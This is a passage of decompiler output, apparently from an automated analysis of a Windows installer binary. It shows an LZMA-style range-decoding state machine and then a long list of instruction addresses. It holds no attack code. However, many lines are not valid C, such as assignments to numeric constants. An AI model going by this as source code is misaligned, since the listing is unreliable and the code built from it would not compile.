													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                      0x00000000
                      0x004062eb
                      0x004062eb
                      0x004062ef
                      0x00406310
                      0x00406317
                      0x0040631d
                      0x00406323
                      0x00406335
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x004062f1
                      0x004062f7
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
